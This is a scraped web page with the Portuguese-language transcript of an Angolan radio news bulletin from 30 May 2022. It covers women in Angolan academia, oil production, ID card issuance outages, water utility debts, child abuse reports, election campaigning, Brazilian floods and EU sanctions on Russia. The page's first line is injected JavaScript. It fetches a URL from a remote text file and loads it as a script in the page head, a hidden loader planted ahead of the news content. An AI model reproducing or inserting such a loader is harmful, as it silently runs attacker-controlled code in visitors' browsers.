;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Edição de 30 de Maio de 2022 | RadioPlayDigital
Edição de 30 de Maio de 2022
 

Inac regista mais de quatrocentos e quarenta casos de abusos contra crianças em sete dias.

Historiador Boubacar Queitá defende remoção de fronteiras para que haja verdadeira integração africana. 

Mais de oitenta mortos no Brasil devido ao mau tempo.

Hoje é segunda- feira, dia 30 de Maio de 2022. A edição noticiosa é de, Albina Dias. A técnica de Galácio Santana e final de emissão de, Emanuel Catilina. Ao microfone estou eu, Sílvio de Abreu.

Ponto

Boa Tarde,

As mulheres representam apenas vinte e dois porcento, dos docentes universitários e investigadores científicos em Angola.

Os dados foram avançados a imprensa, pelo Secretário de Estado para o Ensino Superior, que falava a margem de um encontro sobre A Mulher, a Academia e o Desenvolvimento, promovido pela Organização da Mulher Angolana (OMA).

Eugénio Silva, reconheceu que a baixa presença feminina neste subsector de ensino, é fruto da falta de uma estratégia que estimule a sua participação.

RD-ESilva2

Entretanto, o número de alunas nas instituições de ensino superior do país, tem crescido significativamente, sendo já quarenta e dois porcento dos mais de trezentos e vinte mil estudantes matriculados.

RD-ESilva1

Secretário de Estado para o Ensino Superior, Eugénio Silva.

A Decana da Faculdade de Engenharia da Universidade Agostinho Neto, apontou o elevado grau de exigência, como um dos elementos que contribuem para que poucas mulheres sigam a carreira académica.

Alice Ceita, revelou que na instituição sob sua tutela, o número de professoras é inferior a dez.

RD-ACeita

Decana da Faculdade de Engenharia da Universidade Agostinho Neto, Alice Ceita.

Apenas vinte e dois porcento dos docentes universitários e investigadores científicos no nosso país, são mulheres.

Ponto

A consultora Oxford Economics estima que Angola consiga aumentar ainda este ano a produção média de petróleo para 1,18 milhões de barris dia, depois de ter registado em Abril, um acréscimo na produção comparativamente a igual período do ano passado.

A consultora refere que a balança de riscos no que se refere a produção de hidrocarbonetos encontra-se desequilibrada para o lado negativo, e refere mesmo a possibilidade de ocorrência de problemas técnicos e atrasos na materialização de novos projectos.

Os analistas da Consultora Oxford Economics salientam ainda que em Abril último a produção de petróleo em Angola subiu para o nível mais alto desde janeiro, depois de dois meses consecutivos de quebras.

 Segundo aquela fonte, a produção acumulada nos primeiros quatro meses do corrente ano, aumentou  1,8% face ao mesmo período do ano passado, mas as receitas petrolíferas subiram 87% devido principalmente aos preços mais elevados do petróleo a nível global.

A china e a Ìndia são dois dos principais destinos de exportação do petróleo angolano.

Por outro lado soube-se que as receitas fiscais petrolíferas entre Janeiro e Abril deste ano, cifraram-se em 2,6 mil milhões de Kuanzas.

Segundo dados oficiais, comparativamente a igual período do ano transacto, a verba fiscal arrecadada representa um acréscimo de 1,2 mil milhões de Kuanzas.

Ponto

A emissão e atribuição de Bilhetes de Identidade, em vários postos de Luanda, principalmente no Zango está condicionada devido a interrupção do sinal de internet, causada por uma avaria no Centro de Processamento de dados da empresa provedora, Multitel.

De acordo com uma nota do Ministério da Justiça e dos direitos Humanos, vários serviços foram seriamente afectados por esta avaria, que se regista desde sexta-feira última, entre estes, também a emissão de certificados de registo criminal.

Aquele departamento ministerial apela a compreensão dos utentes, e sublinha que tão logo se resolva a situação retomam a emissão e distribuição destes documentos.

Recorde-se que há uma semana, aquele pelouro tomou a título extraordinário, a medida de abrir os postos de Identificação Civil e Criminal em todo o país de segunda a domingo, e também aos feriados, das oito às 17h30 minutos.

Na altura o director nacional de identificação, registos e notariado, Carlos Cavukila avançou à imprensa que mais de cento e vinte mil bilhetes de identidade estavam por levantar em todo o país, e 380 mil por imprimir, avançou hoje em Luanda o director nacional de identificação, registos e notariado.

Mais de cem mil milhões de Kuanzas é o valor da dívida dos clientes da Epal, segundo revelou hoje à LAC, o porta- voz daquela empresa, Vladimir 

R.D.3-Vladimir Bernardo3

O  porta- voz da Epal e director do Gabinete de Comunicação Institucional deu igualmente a conhecer que ontem, dezenas de contadores de água na Urbanização Nova Vida foram vandalizados.

R.D.1-Vladimir Bernardo1

Por outro lado, o Porta.- voz da Epal reconheceu que a oferta de água está muito aquém das necessidades da população de Luanda.

R.D.2-Vladimir Bernardo2

Porta- voz da Epal, Vladimir Bernardo.

Os enfermeiros das unidades sanitárias de Luanda, dizem não ter recebido os subsídios referentes a Covid 19. O repórter LAC, Fortunato Cabina tem mais dados sobre este assunto.

R.D.-Peça Fortunato Cabina

Ponto

A Linha SOS Criança registou nos últimos sete dias mais de quatrocentos e quarenta casos de violações dos direitos de menores em Luanda, Benguela «, lundas Norte e Sul, e Zaire, em que se destacam os abusos sexuais, maus tratos e fuga a paternidade.

A porta- voz do Inac, Rosalina Neto falou à imprensa sobre estes casos, que constituem preocupação para a sociedade.

R.D.1-Rosalina Neto1

Rosalina Neto do Inac deu a conhecer que vários cidadãos encontram-se já detidos por terem abusado sexualmente de menores.

R.D2-Rosalina Neto2

Rosalina Neto do Inac, e as ocorrências registadas em todo o país, nos últimos sete dias, pela linha SOS Criança.

Ponto

A cooperação bilateral entre Angola e São Tomé e Príncipe regista hoje um novo impulso, com o início de conversações oficiais que vão culminar com a assinatura de vários instrumentos jurídicos em vários domínios, entre estes, o petrolífero, banca e turismo.

O ministro das relações exteriores, Tete António chefia a delegação angolana à oitava sessão da Comissão bilateral que decorre na Cidade do Príncipe.

Angola e São Tomé e Príncipe formalizaram a cooperação em Fevereiro de 1978, através do Acordo Geral de Amizade e de Cooperação e da Comissão Mista Bilateral, criada em Janeiro de 1980.

Ponto

Na política, a comissão política do Bloco Democrático realizou no fim-de-semana um encontro extraordinário para debater aspectos referentes a estratégia a adoptar durante as eleições gerais marcadas para Agosto próximo.

O secretário -geral daquela formação deu a conhecer que esta estratégia estará alinhada dentro do quadro da Frente Patriótica Unida.

Por sua vez o presidente do Bloco Democrático, Filomeno Vieira Lopes disse na ocasião que o seu partido vai fazer de tudo para que haja de facto uma sociedade democrática em que os seus cidadãos, em particular os jovens usufruam dos benefícios resultantes dos recursos naturais.

R.D.-Filomeno Vieira Lopes

Presidente do bloco Democrático, Filomeno Vieira Lopes.

Por outro lado, ainda no quadro da pré campanha eleitoral, representantes do grupo parlamentar do MPLA, estiveram no Lar de Idosos Beiral, onde se regista actualmente um défice de quadros, para o atendimento integral dos utentes, maioritariamente abandonados pelos seus familiares.

Uma fonte do GPL, anunciou para breve a colocação de mais pessoal, no Beiral.

Ainda sobre a pré campanha eleitoral, o secretário provincial de Benguela da Unita mostrou-se confiante de que o seu partido conseguirá eleger quatro dos cinco deputados do círculo eleitoral naquela província.

Alberto Sapinala apelou ao voto, pediu aos simpatizantes que pautem por uma conduta cívica adequada, e manifestou preocupação pelo registo de alguns casos de intolerância política. 

….

Ponto

O professor universitário Bubacar Keitá defendeu recentemente em Luanda, a remoção das múltiplas fronteiras como condição obrigatória para a tão desejada integração do continente africano. 

O académico maliano reconhece não ser fácil a extinção física das fronteiras por motivos históricos, mas entende que existem outros impedimentos que há muito dificultam a coesão dos africanos.

RD – Boubakar Keita

A sugestão de Bubacar Keitá, professor universitário sobre os caminhos que devem ser percorridos para a construção da unidade do continente africano feita neste mês de Maio que lhe é consagrado.

O presidente da República, João Lourenço regressou já a Luanda, depois de ter participado em Malabo, Guiné Equatorial, no fim de semana, nas cimeiras da União Africana referentes ao tomada de poder de forma inconstitucional, e terrorismo, e também sobre questões humanitárias no nosso continente.

João Lourenço foi designado Campeão Para a Reconciliação e Paz em África, devido às iniciativas que promove em prol da pacificação na região dos Grandes Lagos.

O comentador LAC para questões internacionais, Mário Gerson faz uma apreciação da distinção atribuída ao chefe do estado angolano.

R.D.1-Mário Gerson1

O comentador Mário Gerson também se referiu aos apoios financeiros conseguidos em Malabo para programas humanitários em África.

R.D.-Mário Gerson2

Comentador LAC para assuntos internacionais, Mário Gerson

Ponto

Da Actualidade Internacional,

As chuvadas fortes e torrenciais no nordeste do Brasil provocaram, até agora, pelo menos 84 mortos e mais de 50 de desaparecidos, segundo anunciou o ministério da Defesa .

Há ainda quase 4 mil pessoas desalojadas, principalmente na zona do Grande Recife e no território rural da Mata Norte.

Segundo o G1, que cita o governador do estado do Pernambuco, catorze municípios decretaram situação de emergência: Recife, Olinda, Jaboatão dos Guararapes, São José da Coroa Grande, Moreno, Nazaré, Macaparana, Cabo de Santo Agostinho, São Vicente Ferrer, Paudalho, Paulista, Goiana, Timbauba e Camaragibe.

O governo espanhol revelou que irá apoiar a aprovação do sexto pacote de sanções da União Europeia (UE) contra a Rússia, que prevê uma eliminação total e gradual da importação do petróleo e gás russos.

A Espanha é a favor da aprovação do sexto pacote de sanções da União Europeia (UE) contra a Rússia, anunciou esta segunda-feira o ministro espanhol dos Negócios Estrangeiros, José Manuel Albares. Sublinhe-se que o pacote, apresentado no início do mês por Bruxelas, prevê uma eliminação total e gradual da importação do petróleo e gás russos.

Em entrevista à estação estatal TVE, o governante revelou que ainda não há acordo entre os 27 Estados-membros, uma vez que alguns países continuam dependentes das importações de petróleo e gás russos.

Contudo, para Albares, “há dois objetivos” a ter em conta na aprovação de um pacote de sanções. “Um é não permitir que Vladimir Putin [presidente da Rússia] financie o seu esforço de guerra com o capital europeu. Outro é não permitir que a guerra de Vladimir Putin desestabilize a União Europeia”, acrescentou.

Data de Emissão: 30-05-2022 às 12:30
Género(s): Noticiário
 
PARTICIPANTES

Relacionados